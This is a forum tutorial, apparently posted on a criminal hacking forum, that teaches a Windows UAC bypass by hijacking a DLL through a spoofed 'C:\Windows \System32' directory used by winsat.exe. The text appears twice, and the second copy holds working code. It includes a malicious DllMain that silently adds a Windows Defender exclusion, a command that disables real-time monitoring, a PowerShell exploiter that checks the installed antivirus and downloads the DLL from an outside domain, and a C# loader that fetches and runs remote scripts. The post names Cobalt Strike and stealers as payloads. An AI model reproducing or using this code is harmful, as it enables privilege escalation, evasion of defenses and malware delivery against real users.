Hi xss.pro users ,
The Tutorial Goal is to get experience in Writing malwares and red teaming tools with programming languages , and will be for newbies guy who wanted to Raise their skills , also if you are professional you welcome
This tutorial will be translated to russian for people can’t read english .
- First of all How does winsat work ?
The winsat by default when start it starts as Administrator and first thing they did after starting is Loading the required dlls to continue running without these dlls winsat will never run ! so here we take advantage by replacing the original dlls by our malicious dlls and when the Winsat run the dll also will run as Administrator so we can use the dll to lunch our target process as Administrator , for example we can lunch powershell.exe and add commends to add a specific directory to Exclusions list on windows defender ,
Then We can download our malicious exe to the directory that we have added to Exclusions list what ever is , cobalt strike , or stealer etc .
- Now lets get into coding section .?
Winsat is located in “c:\windows\system32\winsat.exe” !!! . did you guess the problem ? yes its located in “c:\windows\system32\” thats mean if we want to replace the original dll we can’t because it will require Administrator privileges ,and here come the MOCK Directory will fixes the problem .
What is mock directory ?
Mock directory is a directory that includes a spaces between slashes \
Normal directory : c:\windows\system32\winsat.exe
Mock directory : c:\windows \system32\winsat.exe
To create a mock directory using powershell will use this New-Item commend .
New-Item '\\?\C:\Windows \System32' -ItemType Directory .
For this point is all good and i guess now you understand how its work .
Now download the attachment and extract the zip file : password is : xss.pro .
Open the visual studio project and go to version this is the dll name we will infecte it .
you cant a normal dll project from visual studio because the winsat will require a specific signature .
Now here we go in entry point DllMain will put our malicious code .
The goal from this dll is to lunch a elevated powershell with Administrator privileges then add a specific directory to Windows defender Exclusions list .
And this can be done by using WinExec function ! I know what you thinking why not use CreateProcess instead of WinExec For some reason it won’t work for me but you still can try.
WinExec it takes to argument first the commend line , and the second argument is for show option to show the powershell set last argument to 1 and to make it hidden set the last argument to 0 .
Ok and the powershell commend .
Let me explain the powershell code for you .
It gets the “c:\programdata” Directory
It add the programdata directory to Windows defender Exclusions list so all files in same directory Windows defender will skip it while scanning , you can change this code to your code maybe disable windows defender using code bellow .
Final code looks like .
Now compile the project and pay attention the architecture should be the same as target version .
And now lets get into a powershell section ?
This script will be the exploiter , wich will create new mock directory and then copy winsat.exe from original directory and save it in the new directory and finally will download the dll and start the winsat.exe process in hidden mode , but in this code i add optional step before the exploit i will check the installed AV if only WD is installed if there other AV installed it will skip the exploit .
Don’t forget the main goal is to get the Administrator privileges .
Change th30c0der.com to your domain or ip it can be localhost .
Now we finished every thing but how can we deliver this powershell script !? for me i will use .net 4.8 and i will use powershell without powershell technique to Execute the powershell script without using powershell.exe , this will bypass restriction if target system blocked powershell.exe on the system
To create ps1 loader project create new c# windows forms app
And choose 4.8 .net version
Got to manage nuget packages
And search for powershell cake package this will download System.Management.Automation.dll .
Now open Program.cs
And remove the default lines that will show the gui window .
The code will be like this
Now lets initialize the configuration runspace and add our powershell commend and invoke it
And the final code will be like this
Please make sure you change the var names and namespace before you compile it
All done we finish here see you in new tutorial .
POC Video.
The Tutorial Goal is to get experience in Writing malwares and red teaming tools with programming languages , and will be for newbies guy who wanted to Raise their skills , also if you are professional you welcome
This tutorial will be translated to russian for people can’t read english .
- Requirements .
- - Visual studio
- - basic c++
- - basic powershell knowledge
- - basic c#
- First of all How does winsat work ?
The winsat by default when start it starts as Administrator and first thing they did after starting is Loading the required dlls to continue running without these dlls winsat will never run ! so here we take advantage by replacing the original dlls by our malicious dlls and when the Winsat run the dll also will run as Administrator so we can use the dll to lunch our target process as Administrator , for example we can lunch powershell.exe and add commends to add a specific directory to Exclusions list on windows defender ,
Then We can download our malicious exe to the directory that we have added to Exclusions list what ever is , cobalt strike , or stealer etc .
- Now lets get into coding section .?
Winsat is located in “c:\windows\system32\winsat.exe” !!! . did you guess the problem ? yes its located in “c:\windows\system32\” thats mean if we want to replace the original dll we can’t because it will require Administrator privileges ,and here come the MOCK Directory will fixes the problem .
What is mock directory ?
Mock directory is a directory that includes a spaces between slashes \
Normal directory : c:\windows\system32\winsat.exe
Mock directory : c:\windows \system32\winsat.exe
To create a mock directory using powershell will use this New-Item commend .
New-Item '\\?\C:\Windows \System32' -ItemType Directory .
For this point is all good and i guess now you understand how its work .
Now download the attachment and extract the zip file : password is : xss.pro .
Open the visual studio project and go to version this is the dll name we will infecte it .
you cant a normal dll project from visual studio because the winsat will require a specific signature .
Now here we go in entry point DllMain will put our malicious code .
The goal from this dll is to lunch a elevated powershell with Administrator privileges then add a specific directory to Windows defender Exclusions list .
And this can be done by using WinExec function ! I know what you thinking why not use CreateProcess instead of WinExec For some reason it won’t work for me but you still can try.
WinExec it takes to argument first the commend line , and the second argument is for show option to show the powershell set last argument to 1 and to make it hidden set the last argument to 0 .
Ok and the powershell commend .
C++:
cmd.exe /c powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command $cankja = [System.Environment]::GetFolderPath('CommonApplicationData');$fcankja= $cankja; Add-MpPreference -ExclusionPath $fcankja;Let me explain the powershell code for you .
[System.Environment]::GetFolderPath('CommonApplicationData');It gets the “c:\programdata” Directory
Add-MpPreference -ExclusionPath $folderpath;It add the programdata directory to Windows defender Exclusions list so all files in same directory Windows defender will skip it while scanning , you can change this code to your code maybe disable windows defender using code bellow .
Enter:Set-MpPreference -DisableRealtimeMonitoring $trueFinal code looks like .
C++:
#include "pch.h"
#include "prxdll.h"
BOOL APIENTRY DllMain(
const HINSTANCE instance,
const DWORD reason,
const PVOID reserved)
{
switch ( reason ) {
case DLL_PROCESS_ATTACH:
WinExec("cmd.exe /c powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command $cankja = [System.Environment]::GetFolderPath('CommonApplicationData');$fcankja= $cankja; Add-MpPreference -ExclusionPath $fcankja; ", 0);
DisableThreadLibraryCalls(instance);
return prx_attach(instance);
case DLL_PROCESS_DETACH:
prx_detach(reserved);
break;
}
return TRUE;
}Now compile the project and pay attention the architecture should be the same as target version .
And now lets get into a powershell section ?
This script will be the exploiter , wich will create new mock directory and then copy winsat.exe from original directory and save it in the new directory and finally will download the dll and start the winsat.exe process in hidden mode , but in this code i add optional step before the exploit i will check the installed AV if only WD is installed if there other AV installed it will skip the exploit .
Don’t forget the main goal is to get the Administrator privileges .
C#:
$computername=$env:computername;
$AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername;
$detected = 0;
foreach($AntiVirusProduct in $AntiVirusProducts)
{
if($AntiVirusProduct.displayName -ne "Windows Defender")
{
# no exploit normal run
$detected = 1;
}
}
if($detected -eq 0)
{
New-Item '\\?\C:\Windows \System32' -ItemType Directory
Set-Location -Path '\\?\C:\Windows \System32'
copy C:\Windows\System32\WinSAT.exe "C:\windows \System32\winSAT.exe"
Invoke-WebRequest -Uri 'http://th30c0der.com/versionx64.dll' -OutFile 'version.dll'
Start-Process -WindowStyle hidden -Filepath 'C:\windows \System32\winSAT.exe'
}Change th30c0der.com to your domain or ip it can be localhost .
Now we finished every thing but how can we deliver this powershell script !? for me i will use .net 4.8 and i will use powershell without powershell technique to Execute the powershell script without using powershell.exe , this will bypass restriction if target system blocked powershell.exe on the system
To create ps1 loader project create new c# windows forms app
And choose 4.8 .net version
Got to manage nuget packages
And search for powershell cake package this will download System.Management.Automation.dll .
Now open Program.cs
And remove the default lines that will show the gui window .
The code will be like this
C#:
using System;
using System.Management.Automation.Runspaces;
namespace PS1Loader
{
internal static class Program
{
static void Main()
{
}
}
}Now lets initialize the configuration runspace and add our powershell commend and invoke it
And the final code will be like this
C#:
using System;
using System.Management.Automation.Runspaces;
namespace PS1Loader
{
internal static class Program
{
static void Main()
{
Runspace runspaceKhamisla = RunspaceFactory.CreateRunspace(RunspaceConfiguration.Create());
runspaceKhamisla.Open();
Pipeline pipeline = runspaceKhamisla.CreatePipeline();
pipeline.Commands.AddScript("$ps1url = '';iex(New-Object Net.WebClient).DownloadString($ps1url)");
pipeline.Invoke();
}
}
}Please make sure you change the var names and namespace before you compile it
All done we finish here see you in new tutorial .
POC Video.
ASAP, i searched little bit there was git github repo but it is deleted 